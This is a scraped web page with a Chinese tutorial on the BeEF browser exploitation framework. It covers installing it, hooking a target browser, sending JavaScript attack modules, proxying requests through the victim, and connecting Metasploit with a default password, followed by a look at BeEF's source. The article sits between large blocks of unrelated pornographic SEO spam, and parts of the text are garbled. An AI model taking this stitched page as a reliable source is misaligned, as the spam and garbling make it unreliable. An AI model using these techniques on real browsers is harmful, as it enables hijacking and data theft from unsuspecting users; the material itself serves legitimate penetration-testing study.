精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

淺談基于瀏覽器的攻擊框架BeEF

安全 數(shù)據(jù)安全
BeEF是瀏覽器攻擊框架的簡(jiǎn)稱,是一款專注于瀏覽器端的滲透測(cè)試工具

一、BeEF簡(jiǎn)介

BeEF是瀏覽器攻擊框架的簡(jiǎn)稱,是一款專注于瀏覽器端的滲透測(cè)試工具。可在其官網(wǎng)找到更詳細(xì)的介紹http://beefproject.com/。

二、安裝BeEF

先下載Beef最新版本

$ svn checkout http://beef.googlecode.com/svn/track/ beef

$ ruby install

選擇第一項(xiàng)自動(dòng)安裝需要的相關(guān)gems即可,也可以選擇2按照提示一個(gè)一個(gè)進(jìn)行安裝,安裝完成后就可以直接啟動(dòng)了

$ ruby beef -x

三、使用說明

3.1 啟動(dòng)BeEF

安裝完成后,啟動(dòng)BeEF

#./beef 

 

命令行中顯示的UI URL以后即為WEB接口,用瀏覽器打開,輸入默認(rèn)密碼beef/beef,即可進(jìn)入BeEF管理頁面

按照提示,假設(shè)此時(shí)目標(biāo)192.168.11.1的服務(wù)器訪問了這個(gè)demo頁面

http://192.168.11.152:3000/demos/basic.html。則就被hook上了,如下圖所示 

 

3.2 實(shí)施攻擊

HOOK持續(xù)的時(shí)間為關(guān)閉測(cè)試頁面為止。在此期間,相當(dāng)于被控制了,可以發(fā)送攻擊命令了。選擇commands欄,可以看到很多已經(jīng)分好類的攻擊模塊。

其中,4種顏色分別表示:

該攻擊模塊可用,且隱蔽性強(qiáng)

該攻擊模塊可用,但隱蔽性查

該用戶模塊是否可用還有待驗(yàn)證

該攻擊模塊不可用 

 

例如,選取MISC下的Raw JavaScript模塊作為測(cè)試用例,右端表格有該模塊的詳細(xì)說明,以及一些可選的參數(shù)等。輸入Javascript code,點(diǎn)擊Excute進(jìn)行攻擊,效果如下圖所示 

 

3.3 Proxy功能

選中目標(biāo)主機(jī),點(diǎn)右鍵,在菜單中選中Use as Proxy 

 

然后再Rider選項(xiàng)卡中的Forge Request 編輯并發(fā)送想要發(fā)送的內(nèi)容 

 

通過查看目標(biāo)瀏覽器firebug記錄,可以確信確實(shí)發(fā)送了該http,達(dá)到了代理效果。同時(shí)Rider下的History選項(xiàng)也記錄了發(fā)送歷史記錄 

#p#

四、Metasploit組合

由于BeEF默認(rèn)是不加載metasploit的,要使用Metasploit豐富的攻擊模塊,需要做些配置。BT5下,首先到beef目錄下修改/pentest/web/beef/config.yaml文件,將其中的metasploit選項(xiàng)改為enable,如下所示:

 

 

然后查看/pentest/web/beef/extensions/metasploit/config.yaml。查看到其中的pass默認(rèn)為abc123,這是與metasploit通信約定的密碼。轉(zhuǎn)到msf目錄 /opt/metasploit/msf3/。新建一個(gè) beef.rc文件,內(nèi)容為

load msgrpc ServerHost=127.0.0.1 Pass=abc123

從而實(shí)現(xiàn)與beef的通信。啟動(dòng)msfconsole,

#msfconsole –r beef.rc,如下圖所示,順利啟動(dòng)服務(wù)。

 

 

現(xiàn)在可以啟動(dòng)beef了,啟動(dòng)后,可以看到BEEF加載了204個(gè)metasploit的攻擊模塊

 

 

頁面如圖,現(xiàn)在可以使用metasploit的模塊進(jìn)行攻擊了。

 

#p#

五、實(shí)現(xiàn)原理

5.1 簡(jiǎn)述

BEEF 采用ruby語言編寫,其目錄結(jié)構(gòu)如下所示:

 

 

除去一些安裝和說明文件,Beef最主要的目錄有三個(gè),core、extension和modules。BEEF的核心文件在core目錄下,各種擴(kuò)展功能在extension目錄下,modules則為攻擊模塊目錄。

5.2 Core

Core目錄是BEEF的核心目錄,并負(fù)責(zé)加載extension和module。其中最關(guān)鍵的文件位于core\main目錄下,其文件結(jié)構(gòu)如下所示:

 

 

Client目錄下均為js文件,是在受控客戶端(hooked browser)使用的js文件,包括net、browser、encode、os等的實(shí)現(xiàn),以u(píng)pdate.js為例,在core\main\client\update.js中可以看到,定義了beef.updater,設(shè)置每隔5秒check一次是否有新的命令,如果有,則獲取并執(zhí)行之。

Console目錄用于命令行控制

Constants目錄定義了各種常量

Handlers目錄主要用于處理來自受控客戶端連接請(qǐng)求。

Models 定義了一些基本的類

Rest目錄:即WEB服務(wù)基于REST原則,是一種輕量級(jí)的HTTP實(shí)現(xiàn)。 在server.rb中可看到,是通過mount的形式將資源與URL相對(duì)應(yīng),即它不是一個(gè)簡(jiǎn)單的WEB目錄服務(wù),任何需要http服務(wù)的資源,都需要先mount才能使用。

def mount(url, http_handler_class, args = nil)

# argument type checking

raise Exception::TypeError, ‘”url” needs to be a string’ if not url.string?

if args == nil

mounts[url] = http_handler_class

else

mounts[url] = http_handler_class, *args

end

print_debug(“Server: mounted handler ‘#{url}’”)

end

………

self.mount(“/init”, BeEF::Core::Handlers::BrowserDetails)

………

# Rack mount points

@rack_app = Rack::URLMap.new(@mounts)

………

# Create the BeEF http server

@http_server = Thin::Server.new(

@configuration.get(‘beef.http.host’),

@configuration.get(‘beef.http.port’),

@rack_app)

5.3 extensions

Extention目錄下為各種擴(kuò)展應(yīng)用

 

 

其中幾個(gè)extension的作用如下:

Admin_ui: 實(shí)現(xiàn)了一個(gè)WEB界面的控制后臺(tái)。

Metasploit: 與metasploit互通相關(guān)的設(shè)置。

Requester: 負(fù)責(zé)處理HTTP請(qǐng)求,其文件如下所示:

 

 

其中:

Extension.rb 是每個(gè)擴(kuò)展必有的文件,是加載該擴(kuò)展的接口文件。

Config.yaml為作者和該擴(kuò)展相關(guān)信息。

Api.rb為自身注冊(cè)的一些API函數(shù)。

Models定義了一個(gè)http模型對(duì)象,例如,其中有個(gè)has_run屬性,當(dāng)請(qǐng)求未發(fā)送時(shí),其值為”waiting”,發(fā)送攻擊時(shí),遍歷狀態(tài)為”waiting”的模塊,并發(fā)送http請(qǐng)求。

Handler.rb 主要是處理http響應(yīng),收到響應(yīng)后將相應(yīng)的模塊has_run狀態(tài)置為complete,并保存到數(shù)據(jù)庫(kù)。

5.4 modules

Modules集合了BEEF的各個(gè)攻擊模塊,一般一個(gè)攻擊模塊分為3個(gè)文件:command.js、config.yaml、module.rb。這樣的結(jié)構(gòu)可以很方便地進(jìn)行模塊添加,易于擴(kuò)展。

Config.yaml: 攻擊模塊相關(guān)信息,如名稱、描述、分類、作者、適用場(chǎng)景等

Module.rb:文件定義了該攻擊模塊的類,繼承了BEFF::Core::Command類,在通用command類的基礎(chǔ)上定義一些該模塊特有的處理函數(shù),如使用較多的一個(gè)函數(shù)是post_execute,即攻擊進(jìn)行后進(jìn)行的操作(一般為保存結(jié)果),如下所示。

class Browser_fingerprinting < BeEF::Core::Command

def post_execute

content = {}

content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil?

content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil?

if content.empty?

content['fail'] = ‘Failed to fingerprint browser.’

end

save content

end

end

Command.js: 即為攻擊代碼,攻擊時(shí)讀取此js并發(fā)送給受控客戶端。以detect_firebug模塊的command.js為例,代碼如下所示:

beef.execute(function() {

var result = “Not in use or not installed”;

if (window.console && (window.console.firebug || window.console.exception)) result = “Enabled and in use!”;

beef.net.send(“”, , “firebug=”+result);

});

代碼很簡(jiǎn)單,在受控客戶端執(zhí)行取得結(jié)果之后,將結(jié)果返回給server端。Beef.net在core/main/client目錄下定義。

在 Core目錄下的Command.rb中,可以看到加載過程,首先判斷該攻擊模塊的command.js是否存在,如存在,就讀取到@eruby,可能還需要進(jìn)行參數(shù)替換,所以需要進(jìn)行evaluate操作。

def output

f = @path+’command.js’

(print_error “#{f} file does not exist”;return) if not File.exists? f

command = BeEF::Core::Models::Command.first(:id => @command_id)

@eruby = Erubis::FastEruby.new(File.read(f))

data = BeEF::Core::Configuration.instance.get(“beef.module.#{@key}”)

cc = BeEF::Core::CommandContext.new

cc['command_url'] = @default_command_url

cc['command_id'] = @command_id

JSON.parse(command['data']).each{|v|

cc[v['name']] = v['value']

}

if self.respond_to?(:execute)

self.execute

end

@output = @eruby.evaluate(cc)

@output

end

責(zé)任編輯:藍(lán)雨淚 來源: 博客
相關(guān)推薦

2019-07-16 07:15:42

瀏覽器網(wǎng)絡(luò)威脅網(wǎng)絡(luò)安全

2017-04-26 14:15:35

瀏覽器緩存機(jī)制

2017-05-15 13:40:20

瀏覽器http緩存機(jī)制

2020-08-16 08:51:22

WEB安全網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)欺騙

2009-06-22 14:06:00

java瀏覽器

2017-05-02 09:25:13

瀏覽器指紋追蹤虛擬化

2013-11-22 15:05:13

DDoSDDoS攻擊

2011-06-10 16:44:17

Qt 瀏覽器

2022-06-04 07:13:20

黑客瀏覽器網(wǎng)絡(luò)攻擊

2024-01-29 12:12:19

2011-04-06 11:30:49

2015-05-06 10:02:26

2011-08-29 14:27:33

QTWebkit瀏覽器

2010-04-05 21:57:14

Netscape瀏覽器

2021-06-30 10:21:29

瀏覽器

2012-04-16 10:04:08

Eclipse瀏覽器IDE

2009-04-03 09:09:21

瀏覽器網(wǎng)絡(luò)辦公室

2012-04-11 10:16:02

EclipseIDE

2015-05-29 11:37:53

2012-03-20 11:31:58

移動(dòng)瀏覽器
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

精品粉嫩超白一线天av| 亚洲福利一区二区三区| 国产日产欧美a一级在线| 蜜桃视频在线观看成人| 天堂网一区二区| 午夜av一区| 精品精品国产高清一毛片一天堂| 亚洲精品无码国产| 国产精品一二三区视频| 国内精品第一页| 久久全球大尺度高清视频| 久久久久久国产精品无码| 日韩美香港a一级毛片| 亚洲电影中文字幕在线观看| 日韩jizzz| 亚洲乱码国产乱码精品精软件| 国产精品三上| 久久国产精品99国产精| 亚欧洲乱码视频| 免费欧美网站| 欧美色图一区二区三区| 国产91在线亚洲| 91在线不卡| 9人人澡人人爽人人精品| 91精品在线观看视频| av资源免费观看| 欧美精品三级| 日韩在线一区二区三区免费视频| 好男人香蕉影院| 国产一区二区视频在线看| 日韩欧美在线一区| 毛片在线视频播放| 天堂8中文在线| 国产精品久久久久久久浪潮网站 | 欧美sss在线视频| 91麻豆精品国产91久久久久久久久 | 婷婷综合一区| 欧美成人伊人久久综合网| 亚洲一区日韩精品| 超碰超碰人人人人精品| 亚洲国产成人va在线观看天堂| 在线不卡日本| 二区三区在线| 国产网红主播福利一区二区| 国产精品一区二区不卡视频| 99久久精品国产一区二区成人| 天堂va蜜桃一区二区三区漫画版| 国内揄拍国内精品少妇国语| 日韩成人毛片视频| 五月开心六月丁香综合色啪| 伊人亚洲福利一区二区三区| 丰腴饱满的极品熟妇| 青青草久久爱| 亚洲经典中文字幕| 国产草草浮力影院| 亚洲成人黄色| 欧美大片免费久久精品三p| 911福利视频| 成人精品国产亚洲| 欧美视频三区在线播放| 亚洲乱码国产一区三区| 97久久香蕉国产线看观看| 色偷偷88欧美精品久久久| 97国产精东麻豆人妻电影| 成人免费观看在线观看| 婷婷久久综合九色综合绿巨人 | 91精品国模一区二区三区| 色噜噜狠狠永久免费| 亚洲欧洲日韩精品在线| 91麻豆精品国产91久久久久 | 91免费精品国自产拍在线不卡| 国外成人在线视频网站| 偷拍自拍在线| 国产欧美一区二区精品仙草咪| 日韩免费电影一区二区| 91网站免费视频| 国产123在线| 久久精品亚洲成在人线av网址| 亚洲精品按摩视频| 久久亚洲AV无码专区成人国产| 国产亚洲电影| www.日韩av.com| 欧美人与禽zozzo禽性配| 亚洲精品裸体| 日本在线精品视频| 91在线观看喷潮| 波多野结衣中文字幕一区二区三区| 久草热久草热线频97精品| 黄色av免费在线看| 亚洲欧美视频一区| www.av中文字幕| 国产91亚洲精品久久久| 日韩精品一区二区在线观看| 久久久久久久久久久国产精品| 久久精品国产99久久| 欧美激情第99页| www.久久久久久久| 国产麻豆一精品一av一免费| 国产一区不卡在线观看| av资源网在线观看| 亚洲午夜久久久久久久久电影院| 91免费视频网站在线观看| 欧美成人xxxx| 亚洲精品不卡在线| 蜜桃av.com| 国产视频久久| 91文字幕巨乱亚洲香蕉| 国产一区电影| 午夜精品免费在线| 午夜免费一级片| 九九视频精品全部免费播放| 欧美日韩福利视频| 中文字幕乱码人妻二区三区| 丁香婷婷深情五月亚洲| 亚洲精品成人久久久998| 国产精品蜜芽在线观看| 91精品婷婷国产综合久久性色| 国产精品无码永久免费不卡| 亚洲一区二区日韩| 国产精品久久久久7777婷婷| 全国男人的天堂网| 亚洲精品网站在线观看| 黄大色黄女片18第一次| 亚洲区小说区图片区qvod| 欧美精品videosex性欧美| 91精品国自产| 欧美高清在线视频| 久久久久国产精品熟女影院 | 国产久一道中文一区| 高清免费电影在线观看| 欧美图片一区二区三区| 一级黄色性视频| 午夜一区不卡| 精品国产免费人成电影在线观...| h片在线免费| 欧美精品高清视频| 在线观看天堂av| 麻豆国产一区二区| 午夜老司机精品| 日韩av首页| 在线电影中文日韩| 久久这里只有精品9| 久久久久久久久久美女| 日韩黄色片视频| 天美av一区二区三区久久| 性色av一区二区三区| 殴美一级特黄aaaaaa| 午夜精品在线视频一区| 99re久久精品国产| 国产欧美日韩亚洲一区二区三区| 韩国成人动漫在线观看| 天天综合av| 亚洲日本欧美日韩高观看| 日韩色图在线观看| 久久午夜羞羞影院免费观看| 国模吧无码一区二区三区 | 中文字幕一区综合| 国产精品白丝久久av网站| 久久精品国产2020观看福利| 一区二区三区播放| 亚洲精品菠萝久久久久久久| 久久久久久久久久久影视| 国产精品观看| 九9re精品视频在线观看re6| 深夜成人在线| 亚洲一区二区久久久| 中文字幕一区二区免费| 综合在线观看色| 国产精品99精品无码视亚| 亚洲午夜一区| 欧美性xxxx69| 日韩毛片免费看| 久久久久久一区二区三区| 刘亦菲毛片一区二区三区| 欧美日韩国产中文字幕| 免费观看a级片| 国产麻豆视频精品| 老太脱裤让老头玩ⅹxxxx| 久久成人av| 成人黄色免费在线观看| sm久久捆绑调教精品一区| 亚洲另类欧美自拍| 国产精品久久婷婷| 欧美日韩国产影院| 看黄色录像一级片| 成人免费看的视频| 天天干在线影院| 午夜国产精品视频免费体验区| 精品久久久久久亚洲| 国产资源一区| 午夜精品一区二区三区在线视频| 国产系列在线观看| 日韩欧美高清一区| 无码无套少妇毛多18pxxxx| 亚洲欧美视频一区| 在哪里可以看毛片| 国产suv精品一区二区883| 免费高清在线观看免费| 91精品国产麻豆国产在线观看| 精品久久久久久亚洲| 白嫩亚洲一区二区三区| 青青草原一区二区| 宅男在线观看免费高清网站| 亚洲欧美精品伊人久久| 亚洲美女福利视频| 欧美日韩精品一区二区三区四区 | 久久久中文字幕| 五月婷婷在线观看| 亚洲毛茸茸少妇高潮呻吟| 精品国产伦一区二区三区| 91国偷自产一区二区开放时间| 永久免费看黄网站| 国产精品网站在线| 日本一级片在线播放| 国产麻豆成人传媒免费观看| 手机看片福利盒子久久| 一区二区三区四区五区精品视频 | 天堂久久久久va久久久久| 免费的av在线| 久久国产中文字幕| 日本高清不卡三区| 亚洲人成网站77777在线观看| 懂色av一区二区三区在线播放| 久久青草视频| 国产精品扒开腿做爽爽爽视频| 国产h片在线观看| 欧美日韩xxx| 岛国成人毛片| 久久久极品av| 老司机精品视频在线观看6| 国产亚洲欧美日韩精品| 欧美一区二区视频| 日韩禁在线播放| 好吊色在线观看| 欧美大片在线观看一区二区| 国产精品无码一区二区桃花视频| 欧美婷婷六月丁香综合色| 久久久久女人精品毛片九一| 亚洲不卡在线观看| 久久亚洲精品大全| 一区二区三区精品在线观看| 东方av正在进入| 亚洲三级在线播放| 综合五月激情网| 亚洲精品视频免费看| 玖玖爱这里只有精品| 亚洲色图.com| 久久午夜无码鲁丝片| 一区二区欧美精品| 日韩a级片在线观看| 亚洲精品v日韩精品| 唐朝av高清盛宴| 亚洲黄色av一区| 久久99久久久| 五月婷婷另类国产| 亚洲国产成人无码av在线| 色综合夜色一区| 波多野结衣一区二区三区四区| 日本道色综合久久| 一级特黄录像免费看| 欧美一区二区网站| 亚洲国产精品一| 亚洲精品国产精品国自产在线| 日本波多野结衣在线| 日韩精品福利网站| yiren22亚洲综合伊人22| 日韩一区二区三区在线播放| 粗大黑人巨茎大战欧美成人| 欧美华人在线视频| 自拍一区在线观看| 国产精品亚洲激情| 国产一区二区在线观| 国产伦精品一区二区三| 九九热爱视频精品视频| 少妇熟女一区二区| 亚洲经典在线看| 丁香婷婷激情网| 国产麻豆91精品| 少妇饥渴放荡91麻豆| 国产精品欧美综合在线| 青娱乐91视频| 日韩欧美精品免费在线| 一级黄色免费看| 精品第一国产综合精品aⅴ| 黄色国产在线| 欧美激情影音先锋| 色综合天天色| 国产精品区一区二区三含羞草| 国产调教一区二区三区| 黄色三级中文字幕| 日韩成人一区二区三区在线观看| 国产xxxxhd| 国产午夜亚洲精品理论片色戒| 中文字幕手机在线观看| 日韩欧美国产激情| www.亚洲黄色| 一区二区三区四区在线观看视频| 91精品久久久| 国产精品高潮呻吟久久av野狼| 日韩中文一区二区| 特级西西444www大精品视频| 黄色成人在线网址| 少妇一级淫免费放| jiyouzz国产精品久久| 激情无码人妻又粗又大| 狠狠久久五月精品中文字幕| 国产乱色精品成人免费视频| 亚洲免费人成在线视频观看| 在线观看av免费| 国产精品免费视频久久久| 羞羞答答一区二区| 免费人成自慰网站| 国产原创一区二区三区| 久久午夜福利电影| 五月天久久比比资源色| 99热这里只有精品在线观看| 亚洲一区二区黄| 天堂电影一区| 精品免费日产一区一区三区免费| 女人香蕉久久**毛片精品| 国产wwwxx| 国产亚洲午夜高清国产拍精品| 日韩女优在线观看| 欧美sm极限捆绑bd| 亚洲性图自拍| 91免费综合在线| 天天av综合| 午夜久久福利视频| 中文字幕的久久| 日本成人一级片| 亚洲新中文字幕| 欧美日韩不卡| 亚洲成人自拍视频| 青青青爽久久午夜综合久久午夜| 精品无码人妻一区| 欧美三级免费观看| 全部免费毛片在线播放网站| 91成人在线视频| 色爱综合av| 两根大肉大捧一进一出好爽视频| aaa国产一区| 亚洲黄色免费观看| 亚洲男人的天堂在线播放| 色偷偷色偷偷色偷偷在线视频| 国产另类第一区| 国产视频一区在线观看一区免费| 国产精品久久久久久久无码| 午夜视频久久久久久| 熟妇人妻一区二区三区四区 | 精品国产鲁一鲁****| 国产奶头好大揉着好爽视频| 久久99热国产| 国产精品视频一区二区三| 日韩一区二区麻豆国产| 欧美野外wwwxxx| 精品久久久久久亚洲| 久久精品1区| 影音先锋男人在线| 91精品国产综合久久精品性色 | 热久久99这里有精品| 国产日韩欧美一区二区三区| 亚洲综合欧美在线| 一区二区三区四区激情| 天天操天天射天天舔| 国产成人精品午夜| 99久久九九| 69xxx免费视频| 色综合天天综合网天天狠天天 | 欧美高清在线观看| 窝窝社区一区二区| 日韩精品视频一二三| 亚洲激情六月丁香| 无码国产精品高潮久久99| 国产激情综合五月久久| 五月久久久综合一区二区小说| 极品白嫩的小少妇| 色天天综合久久久久综合片| 自拍视频在线播放| 国产成人av一区二区三区| 另类av一区二区| 中文字幕五月天| 日韩风俗一区 二区| 精品亚洲a∨| 久久av综合网| 国产精品色眯眯| 色欲av永久无码精品无码蜜桃| 国产成人精品电影| 欧美色图麻豆| 天天舔天天操天天干| 精品久久久久久无| 国产精品无码久久久久| 精品视频免费在线播放| 一色屋精品亚洲香蕉网站| 色欲av永久无码精品无码蜜桃| 国产日韩中文字幕在线| 一本久道久久久| www.av免费| 亚洲人成五月天| 亚洲国产欧美在线观看| 国产91色在线观看|